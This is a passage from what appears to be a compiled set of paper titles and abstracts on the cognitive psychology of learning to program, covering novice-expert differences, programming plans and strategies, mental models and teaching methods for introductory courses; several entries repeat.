SOAR, Laird et al., 1987; ACT*, Anderson, 1983), which a novice programmer also possesses. The learning of computer programming is the acquisition of the appropriate knowledge structures for the problem-solving skills to use. These knowledge structures may then be labelled ‘plans’ (see Chapter 3.1 for more details), though other possibilities exist. The critical feature is that expertise is seen as the acquisition of knowledge. ::: ::: The alternative position is that expertise in programming may involve a variety of cognitive processes which, coupled with changes in knowledge, can give rise to a choice of different methods for solving any particular programming problem. These different methods can be termed strategies. The critical feature of the strategy argument is that observations of novice-expert differences can be caused by either knowledge differences, processing differences, or both. ::: ::: Any assessment of this argument has two important strands. Firstly some evidence questioning the plan-based theory will be presented (evidence for the theory has been covered by the previous chapter) and then evidence of strategic differences will be described. For these reasons it is important that the evidence for alternative aspects to expertise beyond the plan-based theories is carefully considered --- paper_title: Programming pedagogy—a psychological overview paper_content: Can we turn novices into experts in a four year undergraduate program? If so, how? If not, what is the best we can do? While every teacher has his/her own opinion on these questions, psychological studies over the last twenty years have started to furnish scientific answers. Unfortunately, little of these results have been incorporated into curricula or textbooks. This report is a brief overview of some of the more important results concerning computer programming and how they can affect course design. --- paper_title: Studying the Novice Programmer paper_content: Parallel to the growth of computer usage in society is the growth of programming instruction in schools. This informative volume unites a wide range of perspectives on the study of novice programmers that will not only inform readers of empirical findings, but will also provide insights into how novices reason and solve problems within complex domains. The large variety of methodologies found in these studies helps to improve programming instruction and makes this an invaluable reference for researchers planning studies of their own. Topics discussed include historical perspectives, transfer, learning, bugs, and programming environments. --- paper_title: Acquisition of Programming Knowledge and Skills paper_content: Acquiring and developing knowledge about programming is a highly complex process. This chapter presents a framework for the analysis of programming. It serves as a backdrop for a discussion of findings on learning. Studies in the field and pedagogical work both indicate that the processing dimension involved in programming acquisition is mastered best. The representation dimension related to data structuring and problem modelling is the ‘poor relation’ of programming tasks. This reflects the current emphasis on the computational programming paradigm, linked to dynamic mental models. --- paper_title: Comprehension and recall of miniature programs paper_content: Abstract Differences in the comprehensibility of programming notations can arise because their syntax can make them cognitively unwieldy in a generalized way ( Mayer, 1976 ), because all notations are translated into the same “mental language“ but some are easier to translate than others (Shneiderman & Mayer, 1979 ), or because the mental operations demanded by certain tasks are harder in some notations than in others ( Green, 1977 ). The first two hypotheses predict that the relative comprehensibility of two notations will be consistent across all tasks, whereas the mental operations hypothesis suggests that particular notations may be best suited to particular tasks. The present experiment used four notations and 40 non-programmers to test these hypotheses. Two of the notations were procedural and two were declarative, and one of each pair contained cues to declarative or procedural information, respectively. Different types of comprehension question were used (“sequential“ and “circumstantial“); a mental operations analysis predicted that procedural languages would be “matched” with sequential questions, and declarative languages with circumstantial questions. Questions were answered first from the printed text, and then from recall. Subjects performed best on “matched pairs” of tasks and languages. Perceptually-based cues improved the performance on “unmatched pairs” better than non-perceptual cues when answering from the text, and both types of cues improved performance on “unmatched pairs” in the recall stage. These results support the mental operations explanation. They also show that the mental representation of a program preserves some features of the original notation; a comprehended program is not stored in a uniform “mental language”. --- paper_title: Models and theories of programming strategy paper_content: Abstract Much of the literature concerned with understanding the nature of programming skill has focused explicitly upon the declarative aspects of programmers' knowledge. This literature has sought to describe the nature of stereotypical programming knowledge structures and their organization. However, one major limitation of many of these knowledge-based theories is that they often fail to consider the way in which knowledge is used or applied. Another strand of literature is less well represented. This literature deals with the strategic elements of programming skill and is directed towards an analysis of the strategies commonly employed by programmers in the generation and the comprehension of programs. In this paper an attempt is made to unify various analyses of programming strategy. This paper presents a review of the literature in this area, highlighting common themes and concerns, and proposes a model of strategy development which attempts to encompass the central findings of previous research in this area. It is suggested that many studies of programming strategy are descriptive and fail to explain why strategies take the form they do or to explain the typical strategy shifts which are observed during the transitions between different levels of skill. This paper suggests that what is needed is an explanation of programming skill that integrates ideas about knowledge representation with a strategic model, enabling one to make predictions about how changes in knowledge representation might give rise to particular strategies and to the strategy changes associated with developing expertise. This paper concludes by making a number of brief suggestions about the possible nature of this model and its implications for theories of programming expertise. --- paper_title: Variability in program design: the interaction of process with knowledge paper_content: A model of program design is proposed to explain program variability, and is experimentally supported. Variability is shown to be the result of different decisions made by programmers during three stages in the design process. In the first stage, a solution is created based on a particular design approach. In the second stage, actions in the solution are organized by features they share. The actions may then be merged together to define a more concise solution in program code, the third stage of design. Different programs will be created depending, on the approach taken to design the features selected to group actions in a solution, and the features used to merge actions to form program code. Each of the variants observed in the study was traced to the use of a specific piece of information by a programmer at one of the three stages of program design. Many different programs were created as the process of design interacted with the knowledge of the programmer. --- paper_title: Cognitive Psychology and Its Implications paper_content: A fully updated, systematic introduction to the theoretical and experimental foundations of higher mental processes. Avoiding technical jargon, John R. Anderson constructs a coherent picture of human cognition, relating neural functions to mental processes, perception to abstraction, representation to meaning, knowledge to skill, language to thought, and adult cognition to child development. --- paper_title: Strategies of Discourse Comprehension paper_content: rhetorical schemata to be discussed in what follows. Finally, schemata are descriptions, not definitions. The ‘bus’ schema contains information that is nor- --- paper_title: Program Structure and Design paper_content: Abstract Most models of computer programming explain the programmer's behaviour by a single design strategy. This article presents a cognitive architecture that uses cue-based search to model multiple design strategies including procedural, functional, means-end or focal, and opportunistic design. The model has been implemented in an artificial intelligence (AI) system that generates Pascal programs from English specifications. Knowledge is represented as nodes that reside in internal or external memory, where a node encodes an action that may range from a line of code to a routine in size. A program is built by linking nodes through a search cue of the form . The cue is broadcast to memory, and any matching node is returned; the cue provides a question to ask, and the return provides the answer. A cue on the newly linked node is then selected as a new focus, and the search process repeated. Each design strategy defines a specific node visiting order that traverses the program structure through its links. --- paper_title: Human Cognition and Programming paper_content: Abstract This chapter presents an overview of cognition, and reviews the factors that dictate the nature of cognitive models of programming. The computational metaphor is outlined, and the following issues central to information processing are described: knowledge representation, schemas, production rules, procedural and declarative knowledge, attentional and memory resources, semantic memory, problem solving, skill acquisition, and mental models. These issues are fundamental to psychological models of programming presented in later chapters. --- paper_title: Stimulus structures and mental representations in expert comprehension of computer programs paper_content: Abstract Comprehension of computer programs involves detecting or inferring different kinds of relations between program parts. Different kinds of programming knowledge facilitate detection and representation of the different textual relations. The present research investigates the role of programming knowledge in program comprehension and the nature of mental representations of programs; specifically, whether procedural (control flow) or functional (goal hierarchy) relations dominate programmers' mental representations of programs. In the first study, 80 professional programmers were tested on comprehension and recognition of short computer program texts. The results suggest that procedural rather than functional units form the basis of expert programmers' mental representations, supporting work in other areas of text comprehension showing the importance of text structure knowledge in understanding. In a second study 40 professional programmers studied and modified programs of moderate length. Results support conclusions from the first study that programs are first understood in terms of their procedural episodes. However, results also suggest that a programmer's task goals may influence the relations that dominate mental representations later in comprehension. --- paper_title: Syntactic/semantic interactions in programmer behavior: A model and experimental results paper_content: This paper presents a cognitive framework for describing behaviors involved in program composition, comprehension, debugging, modification, and the acquisition of new programming concepts, skills, and knowledge. An information processing model is presented which includes a long-term store of semantic and syntactic knowledge, and a working memory in which problem solutions are constructed. New experimental evidence is presented to support the model of syntactic/semantic interaction. --- paper_title: Mental Representations Constructed by Experts and Novices in Object-Oriented Program Comprehension paper_content: Previous studies on program comprehension were carried out largely in the context of procedural languages. Our purpose is to develop and evaluate a cognitive model of object-oriented (00) program understanding. Our model is based on the van Dijk and Kintsch's model of text understanding (1983). One key aspect of this theoretical approach is the distinction between two kinds of representation the reader might construct from a text: the textbase and the situation model. On the basis of results of an experiment we have conducted, we evaluate the cognitive validity of this distinction in 00 program understanding. We examine how the construction of these two representations is differentially affected by the programmer's expertise and how they evolve differentially over time. --- paper_title: Cognitive processes in program comprehension paper_content: Abstract This paper reports on an empirical study of the cognitive processes involved in program comprehension. Verbal protocols were gathered from professional programmers as they were engaged in a program-understanding task. Based on analysis of these protocols, several types of interesting cognitive events were identified. These include asking questions and conjecturing facts about the code. We describe these event types and use them to derive a computational model of the programmers' mental processes. --- paper_title: Cognitive Psychology and Its Implications paper_content: A fully updated, systematic introduction to the theoretical and experimental foundations of higher mental processes. Avoiding technical jargon, John R. Anderson constructs a coherent picture of human cognition, relating neural functions to mental processes, perception to abstraction, representation to meaning, knowledge to skill, language to thought, and adult cognition to child development. --- paper_title: Studying the Novice Programmer paper_content: Parallel to the growth of computer usage in society is the growth of programming instruction in schools. This informative volume unites a wide range of perspectives on the study of novice programmers that will not only inform readers of empirical findings, but will also provide insights into how novices reason and solve problems within complex domains. The large variety of methodologies found in these studies helps to improve programming instruction and makes this an invaluable reference for researchers planning studies of their own. Topics discussed include historical perspectives, transfer, learning, bugs, and programming environments. --- paper_title: Acquisition of Programming Knowledge and Skills paper_content: Acquiring and developing knowledge about programming is a highly complex process. This chapter presents a framework for the analysis of programming. It serves as a backdrop for a discussion of findings on learning. Studies in the field and pedagogical work both indicate that the processing dimension involved in programming acquisition is mastered best. The representation dimension related to data structuring and problem modelling is the ‘poor relation’ of programming tasks. This reflects the current emphasis on the computational programming paradigm, linked to dynamic mental models. --- paper_title: More or less following a plan during design: opportunistic deviations in specification paper_content: An observational study was conducted on a mechanical engineer throughout his task of defining the functional specifications for the machining operations of a factory automation cell. The engineer described his activity as following a hierarchically structured plan. The actual activity is in fact opportunistically organized. The engineer follows his plan as long as it is cognitively cost-effective. As soon as other actions are more interesting, he abandons his plan to proceed to these actions. This paper analyses when and how these alternative-to-the-plan actions come up. Quantitative results are presented with regard to the degree of plan deviation, the design components and the definitional aspects which are most affected by these deviations, and the deviation patterns. Qualitative results concern their nature. An explanatory framework for plan deviation is proposed in the context of a blackboard model. Plan deviation is supposed to occur if the control, according to certain selection criteria, selects an alternative-to-the-planned-action proposal rather than the planned action proposal. Implications of these results for assistance tools are discussed briefly. --- paper_title: Language Semantics, Mental Models and Analogy paper_content: Abstract The semantics of a number of programming languages is related to the operation of a computer device. Learning a programming language is considered here from the point of view of learning the operating rules of the processing device that underlies the language, as a complement to the learning of new notations, or a new means of expression to be compared to natural language. This acquisition leads beginners to elaborate a new representation and processing system (RPS) by analogy with other systems that are associated to well-known devices. During acquisition, beginners not only learn new basic operations but also the constraints of these operations upon program structures. Learning therefore concerns a basic problem space as well as abstract problem spaces within which planning takes place. The links between this approach to learning to program and a number of related works on learning to use software are underlined. Implications of these research findings in the programmer training are drawn. --- paper_title: Models and theories of programming strategy paper_content: Abstract Much of the literature concerned with understanding the nature of programming skill has focused explicitly upon the declarative aspects of programmers' knowledge. This literature has sought to describe the nature of stereotypical programming knowledge structures and their organization. However, one major limitation of many of these knowledge-based theories is that they often fail to consider the way in which knowledge is used or applied. Another strand of literature is less well represented. This literature deals with the strategic elements of programming skill and is directed towards an analysis of the strategies commonly employed by programmers in the generation and the comprehension of programs. In this paper an attempt is made to unify various analyses of programming strategy. This paper presents a review of the literature in this area, highlighting common themes and concerns, and proposes a model of strategy development which attempts to encompass the central findings of previous research in this area. It is suggested that many studies of programming strategy are descriptive and fail to explain why strategies take the form they do or to explain the typical strategy shifts which are observed during the transitions between different levels of skill. This paper suggests that what is needed is an explanation of programming skill that integrates ideas about knowledge representation with a strategic model, enabling one to make predictions about how changes in knowledge representation might give rise to particular strategies and to the strategy changes associated with developing expertise. This paper concludes by making a number of brief suggestions about the possible nature of this model and its implications for theories of programming expertise. --- paper_title: What do novices learn during program comprehension paper_content: Comprehension of computer programs involves identifying important program parts and inferring relationships between them. The ability to comprehend a computer program is a skill that begins its development in the novice programmer and reaches maturity in the expert programmer. This research examined the beginning of this process, that of comprehension of computer programs by novice programmers. The mental representations of the program text that novices form, which indicate the comprehension strategies being used, were examined. In the first study, 80 novice programmers were tested on their comprehension of short program segments. The results suggested that novices form detailed, concrete mental representations of the program text, supporting work that has previously been done with novice comprehension. Their mental representations were primarily procedural in nature, with little or no modeling using real‐world referents. In a second study, the upper and lower quartile comprehenders from Study 1 were test... --- paper_title: Mental models and computer programming paper_content: Programming is a cognitive activity that requires the learning of new reasoning skills and the understanding of new technical information. Since novices lack domain-specific knowledge, many instructional techniques attempt to provide them with a framework or mental model that can be used for incorporating new information. A major research question concerns how to encourage the acquisition of good mental models and how these models influence the learning process. One possible technique for providing an effective mental model is to use dynamic cues that make transparent to the user all the changes in the variable values, source codes, output, etc., as the program runs. Two groups of novice programmers were used in the experiment. All subjects learned some programming notions in the C language (MIXC). The MIXC version of the programming language provides a debugging facility (C trace) designed to show through a system window all the program components. Subjects were either allowed to use this facility or not allowed to do so. Performance measures of programming and debugging were taken as well as measures directed to assess subjects' mental models. Results showed differences in the way in which the two groups represented and organized programming concepts, although the performance tasks did not show parallel effects. --- paper_title: The Tasks of Programming paper_content: Abstract Computer programming and other design tasks have often been characterized as a set of non-interacting subtasks. In principle, it may be possible to separate these subtasks, but in practice there are substantial interactions between them. We argue that this is a fundamental feature of programming deriving from the cognitive characteristics of the subtasks, the high uncertainty in programming environments, and the social nature of the environments in which complex software development takes place. --- paper_title: Program Structure and Design paper_content: Abstract Most models of computer programming explain the programmer's behaviour by a single design strategy. This article presents a cognitive architecture that uses cue-based search to model multiple design strategies including procedural, functional, means-end or focal, and opportunistic design. The model has been implemented in an artificial intelligence (AI) system that generates Pascal programs from English specifications. Knowledge is represented as nodes that reside in internal or external memory, where a node encodes an action that may range from a line of code to a routine in size. A program is built by linking nodes through a search cue of the form . The cue is broadcast to memory, and any matching node is returned; the cue provides a question to ask, and the return provides the answer. A cue on the newly linked node is then selected as a new focus, and the search process repeated. Each design strategy defines a specific node visiting order that traverses the program structure through its links. --- paper_title: Characteristics of the mental representations of novice and expert programmers: an empirical study paper_content: Abstract This paper presents five abstract characteristics of the mental representation of computer programs: hierarchical structure, explicit mapping of code to goals, foundation on recognition of recurring patterns, connection of knowledge, and grounding in the program text. An experiment is reported in which expert and novice programmers studied a Pascal program for comprehension and then answered a series of questions about it, designed to show these characteristics if they existed in the mental representations formed. Evidence for all of the abstract characteristics was found in the mental representations of expert programmers. Novices' representations generally lacked the characteristics, but there was evidence that they had the beginnings, although poorly developed, of such characteristics. --- paper_title: Conditions of Learning in Novice Programmers paper_content: Under normal instructional circumstances, some youngsters learn programming in BASIC or LOGO much better than others. Clinical investigations of novice programmers suggest that this happens in part... --- paper_title: Programming Languages in Education: The Search for an Easy Start paper_content: (i) We first discuss educational objectives in teaching programming, using Logo research as a vehicle to report on versions of the ‘transfer of competence’ hypothesis. This hypothesis has received limited support in a detailed sense, but not in its original more grandiose conception of programming as a ‘mental gymnasium’. (ii) Difficulties in learning quickly abnegate educational objectives, so we next turn to Prolog, which originally promised to be easy to learn since it reduces the amount of program control that the programmer needs to define, but which turned out to be very prone to serious misconceptions. Recent work suggests that Prolog difficulties may be caused by an inability to see the program working. (iii) Does the remedy therefore lie in starting learners on programmable devices that are low level, concrete and highly visible? Research on this line has brought out another problem: learners find the ‘programming plans’ hard to master. (iv) Finally, we sketch a project designed to teach standard procedural programming via ‘natural plans’. Our conclusions stress pragmatic approaches with much attention to ease of use, avoiding taking ‘economy’ and ‘elegance’ as virtues in their own right. --- paper_title: A goal/plan analysis of buggy pascal programs paper_content: In this paper, we present a descriptive theory of buggy novice programs and a bug categorization scheme that is based on this theory. Central to this theory is the cognitively plausible knowledge--goals and plans--that underlies programming. The bug categorization scheme makes explicit problem-dependent goal and plan knowledge at many different levels of detail. We provide several examples of how the scheme permits us to focus on bugs in a way that facilitates generating plausible accounts of why the bugs may have arisen. In particular, our approach has led us to one explanation of why some novice programs are buggier than others. A basic part of this explanation is the notion of merged goals and merged plans in which a single integrated plan is used to achieve multiple goals. --- paper_title: Pedagogical Changes in the Delivery of the First-Course in Computer Science: Problem Solving, Then Programming paper_content: A teaching reform initiative, started in the spring semester of 1993 at the New Jersey Institute of Technology (NJIT), is described. The program seeks to increase student success in a freshman computer science course, and ultimately in the entire NJIT curriculum. The traditional teaching methods where the teacher presided over a lecture session supplying facts and figures, providing ideas, and presenting problems and their solutions, has been altered. The new learning environment described in this paper aims to create an all-inclusive setting inviting the students to make the transformation from passive learners to active participants. Rather than merely listening to lectures, students formulate problems and devise their own approaches to answering questions and finding solutions. Such a teaching/learning methodology requires instructional redesign and role redefinition. The presentation of class material is reordered as the teacher and students cross each other's confines becoming a more cohesive entity. --- paper_title: Acquisition of Programming Knowledge and Skills paper_content: Acquiring and developing knowledge about programming is a highly complex process. This chapter presents a framework for the analysis of programming. It serves as a backdrop for a discussion of findings on learning. Studies in the field and pedagogical work both indicate that the processing dimension involved in programming acquisition is mastered best. The representation dimension related to data structuring and problem modelling is the ‘poor relation’ of programming tasks. This reflects the current emphasis on the computational programming paradigm, linked to dynamic mental models. --- paper_title: Models and theories of programming strategy paper_content: Abstract Much of the literature concerned with understanding the nature of programming skill has focused explicitly upon the declarative aspects of programmers' knowledge. This literature has sought to describe the nature of stereotypical programming knowledge structures and their organization. However, one major limitation of many of these knowledge-based theories is that they often fail to consider the way in which knowledge is used or applied. Another strand of literature is less well represented. This literature deals with the strategic elements of programming skill and is directed towards an analysis of the strategies commonly employed by programmers in the generation and the comprehension of programs. In this paper an attempt is made to unify various analyses of programming strategy. This paper presents a review of the literature in this area, highlighting common themes and concerns, and proposes a model of strategy development which attempts to encompass the central findings of previous research in this area. It is suggested that many studies of programming strategy are descriptive and fail to explain why strategies take the form they do or to explain the typical strategy shifts which are observed during the transitions between different levels of skill. This paper suggests that what is needed is an explanation of programming skill that integrates ideas about knowledge representation with a strategic model, enabling one to make predictions about how changes in knowledge representation might give rise to particular strategies and to the strategy changes associated with developing expertise. This paper concludes by making a number of brief suggestions about the possible nature of this model and its implications for theories of programming expertise. --- paper_title: Expert Programming Knowledge: A Strategic Approach paper_content: This chapter considers an alternative to the ‘programming plan’ view of programming expertise, namely that expert programmers have a much wider repertoire of strategies available to them as they program than do novices. This analysis does not dispute that experts have ‘plan-like’ knowledge, but questions the importance of the knowledge itself versus an understanding of when or how to use that knowledge. This chapter will firstly examine evidence which challenges the completeness of the plan-based theory and then it will look at evidence which reveals explicit strategic differences. As the studies are presented a list of strategies available to experts will be maintained. Although the emphasis of this section of the book is on expert performance, the chapter concludes with a brief look at studies of novices, since the strategic approach includes the assumption that the strategies used by novices are different from those available to experts. From all these studies it will be seen that experts choose strategies in response to factors such as unfamiliar situations, differing task characteristics and different language requirements, whilst many problems for novice programmers stem not only from lack of knowledge, but also from the lack of an adequate strategy for coping with the programming problem. ::: ::: The previous chapter has presented studies of expertise in computer programming that have concentrated on the content and structure of expert knowledge. The dominant concept has been the ‘programming plan’, which has been proposed as the experts' mental representation of programming knowledge, and which has been used in the development of programming tutors and environments for novice programmers. ::: ::: This chapter examines those aspects of expertise that are not easily explained by plan-based theories. It is intended that the strategic approach described in this chapter should be seen as a complementary, rather than alternative, explanation of expertise. As the various studies are described a list of important strategies which programmers may use will be developed. The studies that are to be presented reveal problems with two implications of the plan-based approach: ::: 1 ::: that ‘programming plans’ provide a complete explanation of expert programming behaviour; ::: ::: 2 ::: that a novice can be defined as someone who does not possess this expert knowledge. ::: ::: ::: ::: ::: An important, but often implicit assumption of the plan-based theorists is that the cognitive processes underlying programming are relatively straightforward. Often based on ideas from artificial intelligence, these processes are taken to be general problem-solving skills (cf. SOAR, Laird et al., 1987; ACT*, Anderson, 1983), which a novice programmer also possesses. The learning of computer programming is the acquisition of the appropriate knowledge structures for the problem-solving skills to use. These knowledge structures may then be labelled ‘plans’ (see Chapter 3.1 for more details), though other possibilities exist. The critical feature is that expertise is seen as the acquisition of knowledge. ::: ::: The alternative position is that expertise in programming may involve a variety of cognitive processes which, coupled with changes in knowledge, can give rise to a choice of different methods for solving any particular programming problem. These different methods can be termed strategies. The critical feature of the strategy argument is that observations of novice-expert differences can be caused by either knowledge differences, processing differences, or both. ::: ::: Any assessment of this argument has two important strands. Firstly some evidence questioning the plan-based theory will be presented (evidence for the theory has been covered by the previous chapter) and then evidence of strategic differences will be described. For these reasons it is important that the evidence for alternative aspects to expertise beyond the plan-based theories is carefully considered --- paper_title: Preprogramming knowledge: a major source of misconceptions in novice programmers paper_content: We present a process model to explain bugs produced by novices early in a programming course. The model was motivated by interviews with novice programmers solving simple programming problems. Our key idea is that many programming bugs can be explained by novices inappropriately using their knowledge of step-by-step procedural specifications in natural language. We view programming bugs as patches generated in response to an impasse reached by the novice while developing a program. We call such patching strategies bug generators. Several of our bug generators describe how natural language preprogramming knowledge is used by novices to create patches. Other kinds of bug generators are also discussed. We describe a representation both for novice natural language preprogramming knowledge and novice fragmentary programming knowledge. Using these representations and the bug generators, we evaluate the model by analyzing four interviews with novice programmers. --- paper_title: Learning flow of control: recursive and iterative procedures paper_content: Two experiments were performed to study students' ability to write recursive and iterative programs and transfer between these two skills. Subjects wrote functions to accumulate instances into a list. Problems varied in terms of whether they were recursive or iterative, whether they operated on lists or numbers, whether they accumulated results in forward or backward manner, whether they accumulated on success or failure, and whether they simply skipped or ejected on failure to accumulate. Subjects had real difficulty only with the dimensions concerned with flow of control, namely, recursive versus iterative, and skip versus eject. We found positive transfer from writing iterative functions to writing recursive functions, but not vice versa. A subsequent protocol study revealed subjects had such a poor mental model of recursion that they developed poor learning strategies which hindered their understanding of iteration. It is argued that having an adequate model of the functionality of programming is prerequisite to learning to program, and that it is sensible pedagogical practice to base understanding of recursive flow of control on understanding iterative flow of control. --- paper_title: Programming pedagogy—a psychological overview paper_content: Can we turn novices into experts in a four year undergraduate program? If so, how? If not, what is the best we can do? While every teacher has his/her own opinion on these questions, psychological studies over the last twenty years have started to furnish scientific answers. Unfortunately, little of these results have been incorporated into curricula or textbooks. This report is a brief overview of some of the more important results concerning computer programming and how they can affect course design. --- paper_title: Fragile knowledge and neglected strategies in novice programmers paper_content: Many students have great difficulty mastering the basics of programming. Inadequate knowledge, neglect of general problem-solving strategies, or both might explain their troubles. We report a series of clinical interviews of students taking first year BASIC in which an experimenter interacted with students as they worked, systematically providing help as needed in a progression from general strategic prompts to particular advice. The results indicate a substantial problem of "fragile knowledge" in novices knowledge that is partial, hard to access, and often misused. The results also show that general strategic prompts often resolve these difficulties. Recommendations for teaching more robust knowledge and general strategies are made. Implications for the impact of programming on general cognitive skills are considered. --- paper_title: A Study of the Development of Programming Ability and Thinking Skills in High School Students paper_content: This article reports on a year-long study of high school students learning computer programming. The study examined three issues: I) what is the impact of programming on particular mathematical and reasoning abilities?; 2) what cognitive skills or abilities best predict programming ability?; and 3) what do students actually understand about programming after two years of high school study? The results showed that even after two years of study, many students had only a rudimentary understanding of programming. Consequently, it was not surprising to also find that programming experience (as opposed to expertise) does not appear to transfer to other domains which share analogous forrnal properties. The article concludes that we need to more closely study the pedagogy of programming and liow expertise can be better attained before we prematurely go looking for significant and wide reaching transfer effects from programming. --- paper_title: Program Structure and Design paper_content: Abstract Most models of computer programming explain the programmer's behaviour by a single design strategy. This article presents a cognitive architecture that uses cue-based search to model multiple design strategies including procedural, functional, means-end or focal, and opportunistic design. The model has been implemented in an artificial intelligence (AI) system that generates Pascal programs from English specifications. Knowledge is represented as nodes that reside in internal or external memory, where a node encodes an action that may range from a line of code to a routine in size. A program is built by linking nodes through a search cue of the form . The cue is broadcast to memory, and any matching node is returned; the cue provides a question to ask, and the return provides the answer. A cue on the newly linked node is then selected as a new focus, and the search process repeated. Each design strategy defines a specific node visiting order that traverses the program structure through its links. --- paper_title: Conditions of Learning in Novice Programmers paper_content: Under normal instructional circumstances, some youngsters learn programming in BASIC or LOGO much better than others. Clinical investigations of novice programmers suggest that this happens in part... --- paper_title: What do novice programmers know about recursion paper_content: Recent research into differences between novice and expert computer programmers has provided evidence that experts know more than novices, and what they know is better organized. The conclusion is only as interesting as it is intuitive. This paper reports an experiment which was designed to determine precisely what novice programmers understand about the behaviour of recursive procedures, and exactly how their understanding differs from an expert's understanding of the process. The results show that different novices understand, or misunderstand, different things. Implications of the findings are discussed with respect to other research into novice and expert programming performance. --- paper_title: Studying the Novice Programmer paper_content: Parallel to the growth of computer usage in society is the growth of programming instruction in schools. This informative volume unites a wide range of perspectives on the study of novice programmers that will not only inform readers of empirical findings, but will also provide insights into how novices reason and solve problems within complex domains. The large variety of methodologies found in these studies helps to improve programming instruction and makes this an invaluable reference for researchers planning studies of their own. Topics discussed include historical perspectives, transfer, learning, bugs, and programming environments. --- paper_title: Cognitive style, personality, and computer programming paper_content: Abstract Within the field of computer programming there is evidence of tremendous variation among individuals achievement in programming. Cognitive styles and personality traits have been investigated as factors that may help explain some of that variability; however, they have failed to consistently explain individual differences in achievement. In the majority of these studies, computer programming has been measured as a single activity. Computer programming has been described as an activity having separate and distinct phases: problem representation, program design, coding, and debugging. It may be that certain cognitive styles and personality dimensions affect some phases but not others. The purpose of this review is twofold. First, the empirical studies on the relation between cognitive style, personality traits and computer programming are reviewed. Second, the paper provides an agenda for future research by providing a conceptual framework that organizes and relates the variety of constructs to the specific phases of writing computer programs and identifies a number of distinct gaps in this particular body of research. --- paper_title: Conditions of Learning in Novice Programmers paper_content: Under normal instructional circumstances, some youngsters learn programming in BASIC or LOGO much better than others. Clinical investigations of novice programmers suggest that this happens in part... --- paper_title: A Study of the Development of Programming Ability and Thinking Skills in High School Students paper_content: This article reports on a year-long study of high school students learning computer programming. The study examined three issues: I) what is the impact of programming on particular mathematical and reasoning abilities?; 2) what cognitive skills or abilities best predict programming ability?; and 3) what do students actually understand about programming after two years of high school study? The results showed that even after two years of study, many students had only a rudimentary understanding of programming. Consequently, it was not surprising to also find that programming experience (as opposed to expertise) does not appear to transfer to other domains which share analogous forrnal properties. The article concludes that we need to more closely study the pedagogy of programming and liow expertise can be better attained before we prematurely go looking for significant and wide reaching transfer effects from programming. --- paper_title: Language Semantics, Mental Models and Analogy paper_content: Abstract The semantics of a number of programming languages is related to the operation of a computer device. Learning a programming language is considered here from the point of view of learning the operating rules of the processing device that underlies the language, as a complement to the learning of new notations, or a new means of expression to be compared to natural language. This acquisition leads beginners to elaborate a new representation and processing system (RPS) by analogy with other systems that are associated to well-known devices. During acquisition, beginners not only learn new basic operations but also the constraints of these operations upon program structures. Learning therefore concerns a basic problem space as well as abstract problem spaces within which planning takes place. The links between this approach to learning to program and a number of related works on learning to use software are underlined. Implications of these research findings in the programmer training are drawn. --- paper_title: Cognitive Principles in the Design of Computer Tutors. paper_content: Abstract : A set of principles are derived from the ACT theory of cognition for designing intelligent tutors: identify the goal structure of the problem space, provide instruction on the problem-solving context, provide immediate feedback in errors, minimize working memory loads, use production system models of the student, adjust the grain size of instruction according to learning principles, enable the student to approach the target skills by successive approximation, and promote use of general problem-solving rules over analogy. These principles have successfully guided our design of tutors for college students learning to program LISP and for high school students learning geometry. --- paper_title: A Study of the Development of Programming Ability and Thinking Skills in High School Students paper_content: This article reports on a year-long study of high school students learning computer programming. The study examined three issues: I) what is the impact of programming on particular mathematical and reasoning abilities?; 2) what cognitive skills or abilities best predict programming ability?; and 3) what do students actually understand about programming after two years of high school study? The results showed that even after two years of study, many students had only a rudimentary understanding of programming. Consequently, it was not surprising to also find that programming experience (as opposed to expertise) does not appear to transfer to other domains which share analogous forrnal properties. The article concludes that we need to more closely study the pedagogy of programming and liow expertise can be better attained before we prematurely go looking for significant and wide reaching transfer effects from programming. --- paper_title: Skill Acquisition and the LISP Tutor paper_content: An analysis of student learning with the LISP tutor indicates that while LISP is complex, learning it is simple. The key to factoring out the complexity of LISP is to monitor the learning of the 500 productions in the LISP tutor which describe the programming skill. The learning of these productions follows the power-law learning curve typical of skill acquisition. There is transfer from other programming experience to the extent that this programming experience involves the same productions. Subjects appear to differ only on the general dimensions of how well they acquire the productions and how well they retain the productions. Instructional manipulations such as remediation, content of feedback, and timing of feedback are effective to the extent they give students more practice programming, and explain to students why correct solutions work. --- paper_title: Cognitive modeling and intelligent tutoring paper_content: Abstract : The ACT theory of skill acquisition and its PUPS successor provide production-system models of the acquisition of skills such as LISP programming, geometry theorm-proving, and solving of algebraic equations. Knowledge begins in declarative form and is used by analogical processes to solve specific problems. Domain specific productions are compiled from the traces of these problem solutions. The model-tracing methodology has been developed as a means of displaying this cognitive theory in intelligent tutoring. Implementation of the model-tracing methodology involves developing a student model, a pedagogical module, and an interface. issues associated with the development of each of these components are discussed. Work on tutoring and work on skill acquisition have proven to symbiotic; that is, each has furthered the other's development. Keywords: Analogy; Artificial Intelligence; Cognitive Science; Computer-Assisted Instruction. --- paper_title: Studying the Use of Peer Learning in the Introductory Computer Science Curriculum paper_content: This paper reports the results of studying the use of peer learning in the introductory computer science curriculum. The project involves educators from a variety of institutions who participated in two summer workshops and either introduced or continued their use of peer learning at their institutions as part of this project. The results of the collective work include much experience with different types of peer learning in different settings. Overall, the results indicate that peer learning is a valuable technique that should be used as one pedagogical approach in teaching the introductory computer science curriculum. --- paper_title: In Support of Pair Programming in the Introductory Computer Science Course paper_content: A formal pair programming experiment was run at North Carolina to empirically assess the educational efficacy of the technique in a CS1 course. Results indicate that students who practice pair programming perform better on programming projects and are more likely to succeed by completing the class with a C or better. Student pairs are more self-sufficient which reduces their reliance on the teaching staff. Qualitatively, paired students demonstrate higher order thinking skills than students who work alone. These results are supportive of pair programming as a collaborative learning technique. --- paper_title: Incorporating problem-solving patterns in CS1 paper_content: In [Wall96], Wallingford describes an approach to introductory courses that is based on programming patterns, i.e., algorithms or problem-solving approaches that can be applied to various applications. By focusing on patterns such as "Input-Process-Test" or "Process all items in a collection", students reason at a higher-level of abstraction when solving problems. In addition, code schema can be provided which apply to certain patterns, and these schema then serve as frameworks for program development. (See also [Rist89], [Coad92], and [GHJV95].)Closely related to the patterns approach is the use of themes in a programming course. Selecting a particular idea (such as self-reference [Astr94]), methodology (such as formal specifications [MH96]), or application domain (such as databases [AR95]) provides a framework for learning new techniques and concepts. Once a concept has been studied in one context, new applications which similarly utilize that concept can be understood more easily.This paper describes the use of a particular problem-solving pattern, binary reduction, as a recurring theme in the CS1 course. Other problem-solving approaches, such as divide-and-conquer or generate-and-test, could similarly be used. By introducing problem-solving patterns early in the course and then revisiting them in different contexts, students learn to look for common characteristics in problems, 